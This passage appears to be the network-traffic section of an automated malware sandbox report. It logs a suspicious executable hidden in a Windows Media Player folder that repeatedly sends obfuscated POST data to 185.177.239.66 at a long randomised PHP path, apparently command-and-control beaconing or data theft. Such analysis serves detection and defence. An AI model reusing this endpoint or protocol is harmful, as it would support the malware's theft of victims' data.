                                                                                        Data Ascii: \]C^[YW_^\PUP\ZXZ][]TRUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:)1>$140&'>963=4><(=.>V'":#%<,Z/=.Y#,Z!3
                                                                                        Jan 8, 2025 18:08:37.505700111 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 3a 06 27 2b 2e 01 23 16 0b 0e 39 3e 3f 03 30 11 29 5d 3e 09 28 04 29 33 28 07 2b 15 0e 59 2b 3b 3e 01 30 02 25 5b 22 12 36 04 22 2a 2c 5f 02 12 26 40 28 0b 23 08 29 3f 0a 05 2b 27 0f 5e 23 22 0c 5d 3f 33 21 09 36 07 23 06 24 30 3a 54 24 1f 3f 54 3f 00 0a 01 38 3d 2d 5e 21 13 21 50 0c 12 23 0a 35 3b 27 0d 21 06 17 5e 29 3b 3a 5e 24 25 21 0f 26 17 2b 13 20 55 2b 54 24 20 34 14 24 28 34 1e 27 28 09 12 24 39 02 19 39 38 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 98:'+.#9>?0)]>()3(+Y+;>0%["6"*,_&@(#)?+'^#"]?3!6#$0:T$?T?8=-^!!P#5;'!^);:^$%!&+ U+T$ 4$(4'($998 S"-S0UQ0
                                                                                        Jan 8, 2025 18:08:37.823250055 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 1636
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:38.040121078 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:38.057806015 CET1636OUTData Raw: 59 5a 43 5b 5b 59 52 5c 5e 5c 50 55 50 59 5a 5d 5a 58 5b 5c 54 5c 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YZC[[YR\^\PUPYZ]ZX[\T\UYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)!%0#$/=-X%-()Y;>>"Q3=.<$Z$+..Y#,Z!7
                                                                                        Jan 8, 2025 18:08:38.272903919 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 5b 25 3b 21 58 20 06 00 55 39 04 20 59 33 3c 32 07 3d 09 37 5c 2a 1d 0a 02 3f 38 38 59 3c 05 22 01 27 2f 31 59 36 02 0f 58 23 2a 2c 5f 02 12 26 44 3c 21 28 51 3d 3c 27 12 2a 27 31 59 23 0c 3d 05 3f 30 21 0a 22 2a 38 1a 32 0d 3e 50 33 31 3c 0b 3c 3e 2b 14 2e 3e 21 10 22 13 21 50 0c 12 20 19 22 38 28 54 21 3b 2a 06 3f 3b 21 02 25 25 25 0d 31 17 02 06 20 20 20 0b 30 23 06 52 32 06 3b 0e 24 3b 34 00 32 00 3c 51 3a 02 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989[%;!X U9 Y3<2=7\*?88Y<"'/1Y6X#*,_&D<!(Q=<'*'1Y#=?0!"*82>P31<<>+.>!"!P "8(T!;*?;!%%%1 0#R2;$;42<Q: S"-S0UQ0
                                                                                        Jan 8, 2025 18:08:38.328814983 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:38.556648016 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:38.556838989 CET2596OUTData Raw: 59 5b 43 5f 5e 58 57 5d 5e 5c 50 55 50 5a 5a 5d 5a 53 5b 5f 54 5c 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y[C_^XW]^\PUPZZ]ZS[_T\UXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9+1-%2#$<Z(9*$-$T>Y+P>>3>1:Y?%<<9=.Y#,Z!+
                                                                                        Jan 8, 2025 18:08:38.887375116 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449971185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:37.204824924 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:37.562119961 CET2596OUTData Raw: 5c 5d 43 53 5b 58 57 50 5e 5c 50 55 50 58 5a 5c 5a 5c 5b 5f 54 51 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \]CS[XWP^\PUPXZ\Z\[_TQU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*6$(Z'53):5\07)*X106R:4^0 -.Y#,Z!#
                                                                                        Jan 8, 2025 18:08:37.921550035 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:38.057146072 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449984185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:39.201363087 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:39.547476053 CET2596OUTData Raw: 59 52 43 58 5b 54 52 5a 5e 5c 50 55 50 5c 5a 59 5a 58 5b 55 54 51 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YRCX[TRZ^\PUP\ZYZX[UTQU\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:+2.$1'350\*9-X%.;=< (.2P3.:S,<'0?39=.Y#,Z!3
                                                                                        Jan 8, 2025 18:08:39.928656101 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:40.062542915 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:39 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449993185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:40.267009020 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:40.608922005 CET2596OUTData Raw: 5c 59 43 5d 5b 55 57 5c 5e 5c 50 55 50 5e 5a 59 5a 5c 5b 59 54 53 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \YC][UW\^\PUP^ZYZ\[YTSUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=1-'2<^'\)5Z0= ) (=1'[&.Y($#.=.Y#,Z!
                                                                                        Jan 8, 2025 18:08:40.954989910 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:41.092442989 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.450002185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:41.408210993 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:41.764998913 CET2592OUTData Raw: 59 5b 43 5e 5e 5a 52 5f 5e 5c 50 55 50 59 5a 5e 5a 5c 5b 5b 54 52 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y[C^^ZR_^\PUPYZ^Z\[[TRU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>"$'0 [)%Z3?)(*13%-7'?:=.Y#,Z!
                                                                                        Jan 8, 2025 18:08:42.095225096 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:42.227199078 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.450008185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:42.373147964 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:42.718717098 CET2596OUTData Raw: 59 53 43 59 5b 55 57 5c 5e 5c 50 55 50 5a 5a 5c 5a 5a 5b 5b 54 56 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YSCY[UW\^\PUPZZ\ZZ[[TVUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:)!2$2(]058Z>*0. V>7U*>1$[&T9<7$<X-.Y#,Z!+
                                                                                        Jan 8, 2025 18:08:43.058353901 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:43.194964886 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.450011185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:43.345217943 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2084
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:43.773447037 CET2084OUTData Raw: 59 59 43 58 5b 5c 57 50 5e 5c 50 55 50 5f 5a 51 5a 5c 5b 5b 54 52 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YYCX[\WP^\PUP_ZQZ\[[TRU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=W*%1#'+*>0-(>8=>3.%.?808..Y#,Z!?
                                                                                        Jan 8, 2025 18:08:44.016099930 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:44.150782108 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 5f 25 38 21 58 23 06 2e 12 2d 2d 02 59 26 2f 0b 59 29 56 34 04 2a 0d 28 00 28 15 2f 01 3f 5d 25 59 24 3c 2a 05 36 3c 35 11 35 00 2c 5f 02 12 25 1a 28 32 02 51 2a 01 2f 5b 3e 27 3e 01 23 0c 2e 5d 2b 20 2e 52 21 39 2c 17 25 0a 26 12 30 1f 24 0e 3c 3d 27 59 2f 07 32 07 36 13 21 50 0c 12 23 09 21 28 37 09 35 38 21 14 3c 01 29 03 25 25 3d 0a 32 00 37 59 21 23 20 0a 24 0d 3f 0b 32 5e 37 0c 25 28 02 01 26 29 30 51 2c 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989_%8!X#.--Y&/Y)V4*((/?]%Y$<*6<55,_%(2Q*/[>'>#.]+ .R!9,%&0$<='Y/26!P#!(758!<)%%=27Y!# $?2^7%(&)0Q,( S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.450013185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:43.494571924 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:43.916763067 CET2596OUTData Raw: 5c 5f 46 59 5e 58 52 5d 5e 5c 50 55 50 58 5a 51 5a 53 5b 54 54 57 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \_FY^XR]^\PUPXZQZS[TTWU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*"6$!+%&="$. W>7P*=$-9-Y 3<^.-.Y#,Z!#
                                                                                        Jan 8, 2025 18:08:44.180738926 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:44.315757036 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.450015185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:45.231789112 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:45.589624882 CET2596OUTData Raw: 59 5e 43 5a 5b 54 57 5f 5e 5c 50 55 50 5b 5a 58 5a 58 5b 55 54 54 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y^CZ[TW_^\PUP[ZXZX[UTTU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^*$!'35<Z*%[$$*Y4=*P&-&,/'/0Y.-.Y#,Z!/
                                                                                        Jan 8, 2025 18:08:45.922132015 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:46.039402962 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.450016185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:47.407368898 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
